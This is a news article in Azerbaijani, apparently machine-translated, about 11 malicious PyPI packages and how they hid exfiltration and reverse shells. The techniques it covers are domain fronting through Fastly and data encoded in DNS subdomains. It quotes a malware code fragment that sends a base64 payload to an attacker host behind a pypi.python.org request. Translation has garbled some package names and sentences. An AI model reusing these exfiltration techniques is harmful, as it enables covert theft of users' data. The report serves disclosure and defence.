PyPI (Python Package Index) kataloqunda zərərli kodu ehtiva edən 11 paket müəyyən edilib. Problemlər müəyyən edilənə qədər paketlər ümumilikdə təxminən 38 min dəfə endirilib. Aşkar edilmiş zərərli paketlər təcavüzkarların serverləri ilə əlaqə kanallarını gizlətmək üçün mürəkkəb metodlardan istifadə etməsi ilə diqqət çəkir.
- mühüm paket (6305 endirmə), mühüm paket (12897) - sistemə qabıq girişini təmin etmək üçün pypi.python.org saytına qoşulma adı altında xarici serverlə əlaqə qurdu (əks qabıq) və məlumatları gizlətmək üçün trevorc2 proqramından istifadə etdi. rabitə kanalı.
- pptest (10001), ipboards (946) - sistem haqqında məlumat ötürmək üçün rabitə kanalı kimi DNS istifadə olunur (birinci paketdə host adı, iş kataloqu, daxili və xarici IP, ikincidə istifadəçi adı və host adı) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - sistemdə Discord xidmət nişanını müəyyən etdi və onu xarici hosta göndərdi.
- trrfab (287) - /etc/passwd, /etc/hosts, /home identifikatorunu, host adını və məzmununu xarici hosta göndərdi.
- 10Cent10 (490) - xarici host ilə tərs qabıq bağlantısı quruldu.
- yandex-yt (4183) - sistemin təhlükəyə məruz qalması və nda.ya.ru (api.ya.cc) vasitəsilə verilən sonrakı hərəkətlər haqqında əlavə məlumatı olan səhifəyə yönləndirilməsi barədə mesaj göstərilir.
Fəaliyyətlərini gizlətmək üçün PyPI kataloqunda istifadə olunan Fastly məzmun çatdırma şəbəkəsindən istifadə edən mühüm paket və mühüm paket paketlərində istifadə olunan xarici hostlara daxil olmaq üsulu xüsusi diqqətə layiqdir. Əslində, sorğular pypi.python.org serverinə göndərildi (HTTPS sorğusunda SNI-də python.org adının göstərilməsi daxil olmaqla), lakin HTTP “Host” başlığına təcavüzkarlar tərəfindən idarə olunan serverin adı daxil idi (san. forward.io. global.prod.fastly.net). Məzmun çatdırılması şəbəkəsi məlumatların ötürülməsi zamanı pypi.python.org saytına TLS bağlantısının parametrlərindən istifadə edərək hücum edən serverə oxşar sorğu göndərib.
PyPI infrastrukturu, tipik sorğuları keşləmək üçün Varnish şəffaf proxy-dən istifadə edən, həmçinin HTTPS sorğularını proxy vasitəsilə yönləndirmək üçün son serverlərdə deyil, CDN səviyyəsində TLS sertifikatının emalından istifadə edən Fastly məzmun çatdırılması şəbəkəsi ilə təchiz edilmişdir. Hədəf hostdan asılı olmayaraq sorğular HTTP “Host” başlığından istifadə edərək istədiyiniz hostu təyin edən proxy-yə göndərilir və host domen adları bütün Fastly müştəriləri üçün xarakterik olan CDN yük balanslaşdırıcısının IP ünvanlarına bağlanır.
Təcavüzkarların serveri həmçinin CDN Fastly ilə qeydiyyatdan keçir, bu da hər kəsə pulsuz planlar təqdim edir və hətta anonim qeydiyyata imkan verir. Maraqlıdır ki, "əks qabıq" yaratarkən qurbana sorğu göndərmək üçün bir sxem də istifadə olunur, lakin təcavüzkarın ev sahibi tərəfindən başlanır. Kənardan, təcavüzkarların serveri ilə qarşılıqlı əlaqə PyPI TLS sertifikatı ilə şifrələnmiş PyPI kataloqu ilə qanuni sessiya kimi görünür. "Domain cəbhəsi" kimi tanınan oxşar texnika əvvəllər blokdan keçərkən host adını gizlətmək üçün fəal şəkildə istifadə olunurdu, bəzi CDN şəbəkələrində SNI-də uydurma hostu göstərməklə və faktiki olaraq serverin adını ötürməklə HTTPS-ə daxil olmaq imkanı istifadə olunurdu. TLS sessiyası daxilində HTTP Host başlığında tələb olunan host.
Zərərli fəaliyyəti gizlətmək üçün TrevorC2 paketi əlavə olaraq adi veb naviqasiyasına bənzər serverlə qarşılıqlı əlaqə yaratmaq üçün istifadə edilmişdir, məsələn, “https://pypi.python.org/images/” şəklini yükləmək adı altında zərərli sorğular göndərilirdi. guid =” guid parametrində məlumat kodlaşdırması ilə. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, başlıqlar = {'Host': "psec.forward.io.global.prod.fastly.net"})
Pptest və ipboards paketləri DNS serverinə sorğularda faydalı məlumatların kodlaşdırılmasına əsaslanaraq şəbəkə fəaliyyətini gizlətmək üçün fərqli yanaşmadan istifadə edirdi. Zərərli proqram “nu4timjagq4fimbuhe.example.com” kimi DNS sorğularını yerinə yetirərək məlumatları ötürür, burada nəzarət serverinə ötürülən məlumat subdomen adında base64 formatından istifadə etməklə kodlanır. Təcavüzkar bu mesajları example.com domeni üçün DNS serverinə nəzarət etməklə qəbul edir.
Mənbə: opennet.ru